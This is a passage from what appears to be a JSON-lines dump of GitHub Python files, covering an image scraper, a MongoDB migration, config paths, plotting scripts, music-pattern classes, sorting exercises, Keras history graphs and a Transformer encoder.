     print(len(moes))\n        if not loading: threading.Thread(None, gen_moes).start()\n        return moe\n\n    def gen_moes():\n        global loading\n        loading = True\n        while len(moes) < 25:\n            btn.click()\n            wait.until(lambda _: btn.is_enabled())\n            moes.append(base64.b64decode(img.get_attribute('src')[22:]))\n            print(len(moes))\n\n        loading = False\n\n    threading.Thread(None, gen_moes).start()\n    run(host='0.0.0.0', port=1337)\nfinally:\n    chrome.close()\n","repo_name":"Ivoah/Photon-Stuff","sub_path":"Moe.py","file_name":"Moe.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2958794253","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom main.settings import db\n\n# Update 
artists\nfor artist in db.artist.find():\n    artist['selected_images'] = []\n\n    if 'images' in artist:\n        for image in artist['images']:\n            if 'published' in image \\\n                    and image['published'] == True:\n                artist['selected_images'].append(image)\n\n    db.artist.update({'_id': artist['_id']}, artist)\n    ## Update this artist on exhibitions as well\n    db.exhibitions.update({\"artist._id\": artist['_id']}, {\"$set\": {\"artist\": artist}}, multi=True)\n    ## Should update this artist on group exhibitions as well\n    db.exhibitions.update({\"artists._id\": artist['_id']}, {\"$set\": {\"artists.$\": artist}}, multi=True)\n","repo_name":"colmoneill/Jason-Scraper","sub_path":"selected_images_migrator.py","file_name":"selected_images_migrator.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2847898897","text":"import os\n\nIs_Use_Reverse_Data=True\n\nBLAST_Process_Num=4\n\nProcess_Num=1\n\nSingularity_Container_Path='./src/Prof_Source/myprof.sif'\n\nD_or_S='D'\n\nMode=''\n\nDocker_Container_Name='myprof'\nDocker_Image_ID='7d9fe6723898'\n\nRaw_Dataset_file=''\n\n\nRaw_PDB_Path='./src/Raw_PDB/'\nWT_PDB_Path='./src/WT_PDB/'\nMUT_PDB_Path='./src/Mut_PDB/'\nWT_Fasta_Path='./src/WT_Fasta/'\nMUT_Fasta_Path='./src/MUT_Fasta/'\nWT_PSSM_Data_Path='./src/PSSM_Data/WT/'\nMUT_PSSM_Data_Path='./src/PSSM_Data/MUT/'\nWT_PSI_BLAST_Data_Path='./src/PSI_BLAST_Data/WT/'\nMUT_PSI_BLAST_Data_Path='./src/PSI_BLAST_Data/MUT/'\nWT_BLASTP_Data_Path='./src/BLASTP_Data/WT/'\nMUT_BLASTP_Data_Path='./src/BLASTP_Data/MUT/'\n\nTMP_Path='./src/TMP/'\n\nTable_Path='./src/Data_Table/'\nRes_Table_Name='data_table.txt'\n\nPred_Table_Path='./src/Pred_Table/'\nPred_Table_Name='pred_table.txt'\nPred_Res_Path='./src/Pred_Res/'\n\nIs_Pred=0\n\nPred_Raw_Dataset_Path='./src/Pred_Raw_Dataset/'\nPred_Raw_Dataset_Name='pred_raw.xls'\n\n\nRing_Path='./bin/ring-3.0.0/ring/bin/'\n\nFoldX_Path='./bin/FoldX_5.0/'\n\nFoldX_Name='foldx_20231231'\n\nRdkit_Path='./bin/rdkit_2023_3_1/'\n\nRdkit_Fdef_Name='BaseFeatures.fdef'\n\n\nFeatures_Table_Path='./src/Features_Table/'\nFeatures_Table_Name='features_table.csv'\n\nModel_Path='./models/'\n\n\nMSA_DB_Path=''\nMSA_DB_Name=''\n\n\nProf_Temp_Path='./src/Prof/'\n\nMain_Location=os.path.abspath('./')+'/'\nHome_Location=os.path.expandvars('$HOME')\n\nR_NMA_Path='./bin/R_NMA/'\nR_NMA_App_Name='NMA.R'\n\nDisEMBL_Path='./bin/DisEMBL_1_4/'\n\nBLAST_Path='./bin/ncbi_blast_2_13_0+/bin/'\n\n\n# WT_MSA_Path='./src/WT_MSA/'\nWT_MSA_Path=''\nSIFT_Path='./bin/sift6_2_1/'\n\n\nClean_Path='./bin/clean/'\n\nAAIndex1_Path='./src/AAindex/aaindex1'\nAAIndex2_Path='./src/AAindex/aaindex2'\nAAIndex3_Path='./src/AAindex/aaindex3'\n","repo_name":"geralt14/Features_Extraction","sub_path":"scripts/Global_Value.py","file_name":"Global_Value.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37915188125","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport argparse\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--pred', required=True)\n\tparser.add_argument('--gt', required=True)\n\targs = parser.parse_args()\n\n\tposes_est = np.loadtxt(args.pred)\n\tx_est = poses_est[:,3]\n\tz_est = poses_est[:,11]\n\n\tposes_gt = np.loadtxt(args.gt)\n\tx_gt = poses_gt[:,3]\n\tz_gt = poses_gt[:,11]\n\n\tplt.plot(x_est, z_est, 'b', 
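# the x/z translations give a top-down view of the trajectory\n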
label='Estimated trajectory')\n\tplt.plot(x_gt, z_gt, 'r', label='Ground truth trajectory')\n\tplt.axis('equal')\n\tplt.grid()\n\tplt.legend()\n\tplt.show()","repo_name":"morsingher/kitti_deep_vo","sub_path":"scripts/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"72994688809","text":"\"\"\"\nThe core pattern classes.\n\"\"\"\nimport abc\nimport inspect\nimport itertools\nimport operator\nimport random\nfrom collections.abc import Sequence\nfrom typing import Callable, Coroutine, Dict, Generator, Iterator, Optional\nfrom uuid import UUID\n\nfrom uqbar.objects import get_vars\n\nimport supriya.patterns\nfrom supriya.clocks import BaseClock, Clock, ClockContext, OfflineClock\nfrom supriya.contexts import Context, Node, Score\n\nfrom .events import CompositeEvent, Event, Priority\n\n\nclass Pattern(metaclass=abc.ABCMeta):\n ### CLASSMETHODS ###\n\n _rngs: Dict[int, Iterator[float]] = {}\n\n ### SPECIAL METHODS ###\n\n def __abs__(self):\n return UnaryOpPattern(\"abs\", self)\n\n def __add__(self, expr):\n return BinaryOpPattern(\"+\", self, expr)\n\n def __eq__(self, expr):\n self_values = type(self), get_vars(self)\n try:\n expr_values = type(expr), get_vars(expr)\n except AttributeError:\n expr_values = type(expr), expr\n return self_values == expr_values\n\n def __floordiv__(self, expr):\n return BinaryOpPattern(\"//\", self, expr)\n\n def __invert__(self):\n return UnaryOpPattern(\"~\", self)\n\n def __iter__(self) -> Generator[Event, bool, None]:\n should_stop = False\n state: Optional[Dict] = self._setup_state()\n iterator = self._iterate(state)\n try:\n expr = self._adjust_recursive(next(iterator), state=state)\n except StopIteration:\n return\n start_event, stop_event = self._setup_peripherals(state)\n if start_event:\n should_stop = (yield start_event) or should_stop\n if not should_stop:\n should_stop = (yield expr) or should_stop\n while True: # Exhaust iterator, even if scheduled to stop\n try:\n expr = self._adjust_recursive(\n iterator.send(should_stop), state=state\n )\n should_stop = (yield expr) or should_stop\n except StopIteration:\n break\n if stop_event:\n yield stop_event\n\n def __mod__(self, expr):\n return BinaryOpPattern(\"%\", self, expr)\n\n def __mul__(self, expr):\n return BinaryOpPattern(\"*\", self, expr)\n\n def __neg__(self):\n return UnaryOpPattern(\"-\", self)\n\n def __pos__(self):\n return UnaryOpPattern(\"+\", self)\n\n def __pow__(self, expr):\n return BinaryOpPattern(\"**\", self, expr)\n\n def __radd__(self, expr):\n return BinaryOpPattern(\"+\", expr, self)\n\n def __rmod__(self, expr):\n return BinaryOpPattern(\"%\", expr, self)\n\n def __rmul__(self, expr):\n return BinaryOpPattern(\"*\", expr, self)\n\n def __rpow__(self, expr):\n return BinaryOpPattern(\"**\", expr, self)\n\n def __rsub__(self, expr):\n return BinaryOpPattern(\"-\", expr, self)\n\n def __rtruediv__(self, expr):\n return BinaryOpPattern(\"/\", expr, self)\n\n def __rfloordiv__(self, expr):\n return BinaryOpPattern(\"//\", expr, self)\n\n def __sub__(self, expr):\n return BinaryOpPattern(\"-\", self, expr)\n\n def __truediv__(self, expr):\n return BinaryOpPattern(\"/\", self, expr)\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state=None):\n return expr\n\n def _adjust_recursive(self, expr, state=None):\n if isinstance(expr, CompositeEvent):\n return CompositeEvent(\n [self._adjust(event, state=state) for event in expr.events],\n 
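# adjust each child event but keep the composite's original delta\n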
delta=expr.delta,\n )\n return self._adjust(expr, state=state)\n\n def _apply_recursive(self, procedure, *exprs):\n if all(not isinstance(x, Sequence) for x in exprs):\n return procedure(*exprs)\n coerced_exprs = [\n expr if isinstance(expr, Sequence) else [expr] for expr in exprs\n ]\n max_length = max(len(expr) for expr in coerced_exprs)\n for i, expr in enumerate(coerced_exprs):\n if len(expr) < max_length:\n cycle = itertools.cycle(expr)\n coerced_exprs[i] = [next(cycle) for _ in range(max_length)]\n return tuple(\n self._apply_recursive(procedure, *items) for items in zip(*coerced_exprs)\n )\n\n def _freeze_recursive(self, value):\n if isinstance(value, str):\n return value\n elif isinstance(value, Sequence) and not isinstance(value, Pattern):\n return tuple(self._freeze_recursive(_) for _ in value)\n return value\n\n def _get_rng(self):\n identifier = None\n try:\n # Walk frames to find an enclosing SeedPattern._iterate()\n frame = inspect.currentframe()\n while frame is not None:\n if (\n isinstance(frame.f_locals.get(\"self\"), SeedPattern)\n and frame.f_code.co_name == \"_iterate\"\n ):\n identifier = id(frame)\n break\n frame = frame.f_back\n finally:\n del frame\n if identifier in self._rngs:\n return self._rngs[identifier]\n return self._get_stdlib_rng()\n\n def _get_seeded_rng(self, seed: int = 1) -> Iterator[float]:\n while True:\n seed = (seed * 1_103_515_245 + 12345) & 0x7FFFFFFF\n yield float(seed) / 0x7FFFFFFF\n\n def _get_stdlib_rng(self) -> Iterator[float]:\n while True:\n yield random.random()\n\n @abc.abstractmethod\n def _iterate(self, state=None):\n raise NotImplementedError\n\n def _loop(self, iterations=None):\n if iterations is None:\n while True:\n yield True\n else:\n for _ in range(iterations):\n yield True\n\n def _setup_state(self) -> Optional[Dict]:\n return None\n\n def _setup_peripherals(self, state):\n return None, None\n\n ### PUBLIC METHODS ###\n\n def play(\n self,\n context: Context,\n *,\n at: Optional[float] = None,\n callback: Optional[\n Callable[\n [\"supriya.patterns.PatternPlayer\", ClockContext, Event, Priority],\n Optional[Coroutine],\n ]\n ] = None,\n clock: Optional[BaseClock] = None,\n quantization: Optional[str] = None,\n target_node: Optional[Node] = None,\n tempo: Optional[float] = None,\n until: Optional[float] = None,\n uuid: Optional[UUID] = None,\n ):\n from .players import PatternPlayer # Avoid circular import\n\n if isinstance(context, Score):\n clock = OfflineClock()\n at = at or 0.0\n elif clock is None:\n clock = Clock.default()\n player = PatternPlayer(\n pattern=self,\n context=context,\n clock=clock,\n callback=callback,\n target_node=target_node,\n uuid=uuid,\n )\n player.play(quantization=quantization, at=at, until=until)\n return player\n\n ### PUBLIC PROPERTIES ###\n\n @abc.abstractproperty\n def is_infinite(self):\n raise NotImplementedError\n\n\nclass BinaryOpPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, operator, expr_one, expr_two):\n self._operator = operator\n self._expr_one = self._freeze_recursive(expr_one)\n self._expr_two = self._freeze_recursive(expr_two)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n expr_one = self.expr_one\n if not isinstance(expr_one, Pattern):\n expr_one = SequencePattern([expr_one], None)\n expr_one = iter(expr_one)\n expr_two = self.expr_two\n if not isinstance(expr_two, Pattern):\n expr_two = SequencePattern([expr_two], None)\n expr_two = iter(expr_two)\n operator = self._string_to_operator()\n for item_one, item_two in zip(expr_one, expr_two):\n 
yield self._apply_recursive(operator, item_one, item_two)\n\n def _string_to_operator(self):\n operators = {\n \"%\": operator.__mod__,\n \"*\": operator.__mul__,\n \"**\": operator.__pow__,\n \"+\": operator.__add__,\n \"-\": operator.__sub__,\n \"/\": operator.__truediv__,\n \"//\": operator.__floordiv__,\n }\n return operators[self.operator]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def expr_one(self):\n return self._expr_one\n\n @property\n def expr_two(self):\n return self._expr_two\n\n @property\n def is_infinite(self):\n expr_one_is_infinite = (\n not isinstance(self.expr_one, Pattern) or self.expr_one.is_infinite\n )\n expr_two_is_infinite = (\n not isinstance(self.expr_two, Pattern) or self.expr_two.is_infinite\n )\n return expr_one_is_infinite and expr_two_is_infinite\n\n @property\n def operator(self):\n return self._operator\n\n\nclass UnaryOpPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, operator, expr):\n self._operator = operator\n self._expr = expr\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n expr = self.expr\n if not isinstance(expr, Pattern):\n expr = SequencePattern([expr], None)\n expr = iter(expr)\n operator = self._string_to_operator()\n for item in expr:\n yield self._apply_recursive(operator, item)\n\n def _string_to_operator(self):\n operators = {\n \"~\": operator.invert,\n \"-\": operator.__neg__,\n \"+\": operator.__pos__,\n \"abs\": operator.abs,\n }\n return operators[self.operator]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def expr(self):\n return self._expr\n\n @property\n def is_infinite(self):\n return not isinstance(self.expr, Pattern) or self.expr.is_infinite\n\n @property\n def operator(self):\n return self._operator\n\n\nclass SeedPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, seed=0):\n if not isinstance(pattern, Pattern):\n raise ValueError(f\"Must be pattern: {pattern!r}\")\n self._pattern = pattern\n self._seed = int(seed)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n try:\n identifier = id(inspect.currentframe())\n rng = self._get_seeded_rng(seed=self.seed)\n self._rngs[identifier] = rng\n yield from self._pattern\n finally:\n del self._rngs[identifier]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n @property\n def pattern(self):\n return self._pattern\n\n @property\n def seed(self):\n return self._seed\n\n\nclass SequencePattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, sequence, iterations=1):\n if not isinstance(sequence, Sequence):\n raise ValueError(f\"Must be sequence: {sequence!r}\")\n if iterations is not None:\n iterations = int(iterations)\n if iterations < 1:\n raise ValueError(\"Iterations must be null or greater than 0\")\n self._sequence = self._freeze_recursive(sequence)\n self._iterations = iterations\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n should_stop = False\n for _ in self._loop(self._iterations):\n for x in self._sequence:\n if not isinstance(x, Pattern):\n should_stop = (yield x) or should_stop\n else:\n iterator = iter(x)\n try:\n y = next(iterator)\n should_stop = (yield y) or should_stop\n while True:\n y = iterator.send(should_stop)\n should_stop = (yield y) or should_stop\n except StopIteration:\n pass\n if should_stop:\n return\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n if self._iterations is None:\n return True\n for x in self._sequence:\n if isinstance(x, Pattern) and x.is_infinite:\n return True\n return 
False\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/patterns/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":12320,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"3301123658","text":"#%%\nimport logging\nimport os\nimport time\nfrom pathlib import Path\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.cluster.hierarchy import linkage\nfrom scipy.spatial.distance import squareform\nfrom scipy.stats.mstats import gmean\nfrom sklearn.preprocessing import QuantileTransformer\nfrom umap import UMAP\nimport navis\nimport pymaid\nfrom giskard.plot import (\n dissimilarity_clustermap,\n screeplot,\n simple_scatterplot,\n simple_umap_scatterplot,\n stacked_barplot,\n)\nfrom giskard.stats import calc_discriminability_statistic\nfrom giskard.utils import careys_rule\nfrom graspologic.cluster import DivisiveCluster\nfrom graspologic.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspologic.plot import pairplot\nfrom graspologic.utils import pass_to_ranks, remap_labels, symmetrize\nfrom src.data import load_metagraph\nfrom src.embed import JointEmbed, unscale\nfrom src.io import savefig\nfrom src.metrics import calc_model_liks, plot_pairedness\nfrom src.pymaid import start_instance\nfrom src.visualization import CLASS_COLOR_DICT, adjplot, set_theme, simple_plot_neurons\n\nimport SpringRank as sr\n\nmg = load_metagraph(\"G\")\nmg.make_lcc()\n\nmeta = mg.meta\n\n\n#%%\n\ngraph_types = [\"Gaa\", \"Gad\", \"Gda\", \"Gdd\"]\n\ngraphs = {}\n\nfor graph_type in graph_types:\n temp_mg = load_metagraph(graph_type)\n temp_mg = temp_mg.reindex(meta.index, use_ids=True)\n assert (temp_mg.meta.index.values == meta.index.values).all()\n graphs[graph_type] = temp_mg.adj\n\n#%%\nfrom graspologic.utils import get_lcc\nfrom scipy.stats import rankdata\n\nfor graph_type in graph_types:\n adj = graphs[graph_type]\n adj_lcc, inds = get_lcc(adj, return_inds=True)\n ranks = sr.get_ranks(adj_lcc)\n meta[f\"{graph_type}_sr_score\"] = np.nan\n meta[f\"{graph_type}_sr_rank\"] = np.nan\n meta.loc[meta.index[inds], f\"{graph_type}_sr_score\"] = ranks\n spring_rank = rankdata(ranks)\n meta.loc[meta.index[inds], f\"{graph_type}_sr_rank\"] = spring_rank\n\n#%%\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, print_out=False, **kws)\n\n\n#%%\nfrom scipy.stats import spearmanr, pearsonr\n\nset_theme()\nhue_key = \"simple_class\"\nvar = \"sr_score\"\nn_graphs = 4\n\nfig, axs = plt.subplots(n_graphs, n_graphs, figsize=(16, 16))\nfor i, row_graph in enumerate(graph_types):\n for j, col_graph in enumerate(graph_types):\n\n x_var = f\"{col_graph}_{var}\"\n y_var = f\"{row_graph}_{var}\"\n\n spearman_corr, _ = spearmanr(meta[x_var], meta[y_var], nan_policy=\"omit\")\n\n ax = axs[i, j]\n if i > j:\n sns.scatterplot(\n data=meta,\n x=x_var,\n y=y_var,\n hue=hue_key,\n palette=CLASS_COLOR_DICT,\n ax=ax,\n s=5,\n alpha=0.5,\n linewidth=0,\n legend=False,\n )\n text = ax.text(\n 0.98,\n 0.03,\n r\"$\\rho = $\" + f\"{spearman_corr:0.2f}\",\n transform=ax.transAxes,\n ha=\"right\",\n va=\"bottom\",\n color=\"black\",\n )\n text.set_bbox(dict(facecolor=\"white\", alpha=0.6, edgecolor=\"w\"))\n elif i == j:\n sns.histplot(\n data=meta,\n x=x_var,\n ax=ax,\n bins=50,\n element=\"step\",\n # color=\"grey\",\n hue=hue_key,\n 
palette=CLASS_COLOR_DICT,\n                legend=False,\n                stat=\"density\",\n                common_norm=True,\n            )\n        else:\n            ax.axis(\"off\")\n        ax.set(xticks=[], yticks=[], xlabel=\"\", ylabel=\"\")\n        if i == n_graphs - 1:\n            ax.set(xlabel=f\"{col_graph}\")\n        if j == 0:\n            ax.set(ylabel=f\"{row_graph}\")\n    stashfig(f\"{var}-pairwise\")\n# %%\n\nfor graph_type in graph_types:\n    adj = graphs[graph_type]\n    adj_lcc, inds = get_lcc(adj, return_inds=True)\n    ranks = sr.get_ranks(adj_lcc)\n    beta = sr.get_inverse_temperature(adj_lcc, ranks)\n    print(beta)\n\n#%%\nA = adj_lcc.copy()\n\nranks = sr.get_ranks(A)\nbeta = sr.get_inverse_temperature(A, ranks)\n\n\ndef estimate_spring_rank_P(A, ranks, beta):\n    H = ranks[:, None] - ranks[None, :] - 1\n    H = np.multiply(H, H)\n    H *= 0.5\n    P = np.exp(-beta * H)\n    P *= np.mean(A) / np.mean(P)\n    return P\n\n\n#%%\nfrom graspologic.plot import heatmap\nfrom src.visualization import adjplot\n\n\n#%%\n\n\nfor graph_type in graph_types:\n    adj = graphs[graph_type]\n    A, inds = get_lcc(adj, return_inds=True)\n    ranks = sr.get_ranks(A)\n    beta = sr.get_inverse_temperature(A, ranks)\n    P = estimate_spring_rank_P(A, ranks, beta)\n    sort_inds = np.argsort(-ranks)\n\n    fig, axs = plt.subplots(1, 2, figsize=(10, 5))\n    adjplot(P[np.ix_(sort_inds, sort_inds)], ax=axs[0], cbar=False, title=r\"$\\hat{P}$\")\n    adjplot(\n        A[np.ix_(sort_inds, sort_inds)],\n        plot_type=\"scattermap\",\n        ax=axs[1],\n        sizes=(1, 1),\n        title=r\"$A$\",\n    )\n    stashfig(f\"{graph_type}-sr-prob-model\")\n\n#%%\nsort_inds = np.argsort(-ranks)\nfig, axs = plt.subplots(1, 2, figsize=(10, 5))\nadjplot(P[np.ix_(sort_inds, sort_inds)], ax=axs[0], cbar=False)\nadjplot(A[np.ix_(sort_inds, sort_inds)], plot_type=\"scattermap\", ax=axs[1])\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/207.0-BDP-rank-revisited.py","file_name":"207.0-BDP-rank-revisited.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"13375776150","text":"############################\n#         Sorting          #\n############################\n# Arranging data according to a specific criterion\n# Selection sort\n# Repeatedly select the smallest element and swap it with the front element\narr=[7,5,9,0,3,1,6,2,4,8]\nfor i in range(len(arr)):\n    min_i=i\n    for j in range(i+1,len(arr)):\n        if arr[min_i]>arr[j]:\n            min_i=j\n    arr[i],arr[min_i]=arr[min_i],arr[i]\nprint(arr)\n# Insertion sort\n# Check each element and move it only when necessary\narr=[7,5,9,0,3,1,6,2,4,8]\nfor i in range(len(arr)):\n    for j in range(i,0,-1):\n        if arr[j]<arr[j-1]:\n            arr[j],arr[j-1]=arr[j-1],arr[j]\n        else:\n            break\nprint(arr)\n# Quick sort\n# Pick a reference value (pivot) and swap the elements that are larger and smaller than it\narr = [5, 7, 9, 0, 3, 1, 6, 2, 4, 8]\ndef qu(arr, start, end):\n    if start >= end:\n        return\n    pivot = start\n    l = start + 1\n    r = end\n    while (l <= r):\n        while (l <= end and arr[l] < arr[pivot]):\n            l += 1\n        while (r > start and arr[r] >= arr[pivot]):\n            r -= 1\n        if (l > r):\n            arr[r], arr[pivot] = arr[pivot], arr[r]\n        else:\n            arr[l], arr[r] = arr[r], arr[l]\n    qu(arr, start, r - 1)\n    qu(arr, r + 1, end)\nqu(arr, 0, len(arr) - 1)\nprint(arr)\n# Counting sort\n# Used when the range of values is limited and can be represented as integers. Runs very fast\narr=[7,5,9,0,3,1,6,2,9,1,4,8,0,5,2]\ncnt=[0]*(max(arr)+1)\nfor i in range(len(arr)):\n    cnt[arr[i]]+=1\nfor i in range(len(cnt)):\n    for j in range(cnt[i]):\n        print(i,end=' ')","repo_name":"ejcho3792/Algorithm","sub_path":"coding_test_with_python/CH0601_sort.py","file_name":"CH0601_sort.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2185053354","text":"test = int(input())\r\n\r\nfor i in range(test):\r\n    floor = int(input()) + 1\r\n    num = int(input())\r\n    apartment = [[0]*num for i in range(floor)]\r\n    people = 0\r\n\r\n    for n in range(1, num+1):  # num people live in unit num on floor 0\r\n        apartment[0][n-1] = n\r\n    \r\n    for n in range(floor):\r\n        apartment[n][0] = 1  # 1 person lives in unit 1 on every floor\r\n\r\n    for n in range(1, floor):\r\n        for m in range(1, num):\r\n            apartment[n][m] = apartment[n][m-1] + apartment[n-1][m]\r\n\r\n    print(apartment[floor-1][num-1])","repo_name":"rloldl-c/algorithm","sub_path":"백준/Bronze/2775. 부녀회장이 될테야/부녀회장이 될테야.py","file_name":"부녀회장이 될테야.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"29151044430","text":"from keras_character_based_ner.src.matt.file_management import unpickle_large_file\nfrom typing import Dict\n\n# Examples in this file taken from\n# Deep Learning with Python\n# by François Chollet\n# Published by Manning Publications, 2017\n# Chapter 6 'Deep learning for text and sequences'\n\n\ndef graph_model_history(filepath, dest_file_name):\n    \"\"\"\n    Open a pickled `history` object created by a train (fit() invocation),\n    and graph out the non-null-label accuracy, categorical accuracy, and loss\n    on both training and validation datasets.\n    :param filepath: path to the pickled history file.\n    :param dest_file_name: a destination file name for the files. This name will\n    be used 3 times, with words added to indicate which metric is shown in its graph.\n    e.g. 
'toy-model'\n :return:\n \"\"\"\n import matplotlib # type: ignore\n matplotlib.use('TkAgg')\n import matplotlib.pyplot as plt # type: ignore\n history_dict = unpickle_large_file(filepath)\n\n cat_acc = history_dict['categorical_accuracy']\n non_null_label_acc = history_dict['non_null_label_accuracy']\n loss = history_dict['loss']\n val_loss = history_dict['val_loss']\n val_cat_acc = history_dict['val_categorical_accuracy']\n val_non_null_label_acc = history_dict['val_non_null_label_accuracy']\n\n epochs = range(1, len(cat_acc) + 1)\n\n plt.figure(1)\n\n plt.plot(epochs, cat_acc, 'bo', label='Training acc')\n plt.plot(epochs, val_cat_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-acc.png'.format(dest_file_name))\n\n plt.figure(2)\n\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-loss.png'.format(dest_file_name))\n\n plt.figure(3)\n\n plt.plot(epochs, non_null_label_acc, 'bo', label='Non null label accuracy')\n plt.plot(epochs, val_non_null_label_acc, 'b', label='Validation Non null label accuracy')\n plt.title('Training and validation non null label accuracy')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-non-null-label-acc.png'.format(dest_file_name))\n","repo_name":"fatal-exception/project","sub_path":"keras_character_based_ner/src/matt/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11480926702","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 6 12:44:46 2023\r\n\r\n@author: kisen\r\n\"\"\"\r\n\r\nimport itertools\r\n\r\nfrom similarity_models.model_classes import Siamese_LeNet5_var, \\\r\n Siamese_MobileNetV3_var, Siamese_ResNet18_var\r\n\r\n\r\nfrom torch import optim\r\n\r\nMODEL_HP_DICT = {\r\n 'epochs': [50],\r\n \r\n 'learningRate': [0.0005],\r\n \r\n 'batchSize': [128],\r\n \r\n 'percentOfPairs': [1.0],\r\n \r\n 'lossFunction': [\"Triplet\"],\r\n \r\n 'similarityFlag': [False],\r\n \r\n \r\n \r\n \r\n 'CylindricalModel': [True], 'model': [Siamese_LeNet5_var], \r\n \r\n \r\n \r\n \r\n 'optimizer': [optim.Adam]\r\n}\r\n\r\n\r\n# Create a list of all possible combinations of hyperparameters\r\nMODEL_HP = list(itertools.product(*MODEL_HP_DICT.values()))\r\n\r\nMODEL_HP_LIST = []\r\n\r\n# Loop over each combination of hyperparameters\r\nfor hyperparams in MODEL_HP:\r\n \r\n # Converts the combination back to a dictionary, and stores them in a list\r\n MODEL_HP_LIST.append(dict(zip(MODEL_HP_DICT.keys(), hyperparams)))","repo_name":"kisen123/mastersthesis","sub_path":"mastersthesis/hyperparameters/MODEL_HPs.py","file_name":"MODEL_HPs.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249547048","text":"\"\"\"Defines Transformer model in tf.keras API.\"\"\"\nimport tensorflow as tf\n\nimport utils\nfrom commons.tokenization import SOS_ID\nfrom commons.tokenization import EOS_ID\nfrom commons import beam_search\nfrom commons.layers import EmbeddingLayer\nfrom commons.layers import FeedForwardNetwork\nfrom commons.layers import Attention\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n \"\"\"The building block that makes the encoder 
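# The MODEL_HPs module above expands a dict of hyperparameter lists into a
# list of concrete configurations. The idiom, reduced to a toy grid (the key
# names here are illustrative): itertools.product over the value lists, then
# zip each combination back against the keys -- safe because dicts preserve
# insertion order in Python 3.7+, so keys() and values() stay aligned.
import itertools

grid = {"learningRate": [0.01, 0.001], "batchSize": [32, 64]}
configs = [dict(zip(grid.keys(), values))
           for values in itertools.product(*grid.values())]
assert len(configs) == 4  # the Cartesian product of 2 x 2 choices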
stack of layers, consisting of an\n attention sublayer and a feed-forward sublayer.\n \"\"\"\n def __init__(self, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers.\n \"\"\"\n super(EncoderLayer, self).__init__()\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._mha = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha = tf.keras.layers.LayerNormalization() \n self._dropout_mha = tf.keras.layers.Dropout(dropout_rate)\n\n self._ffn = FeedForwardNetwork(hidden_size, filter_size, dropout_rate)\n self._layernorm_ffn = tf.keras.layers.LayerNormalization()\n self._dropout_ffn = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, inputs, padding_mask, training):\n \"\"\"Computes the output of the encoder layer.\n\n Args:\n inputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n input source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 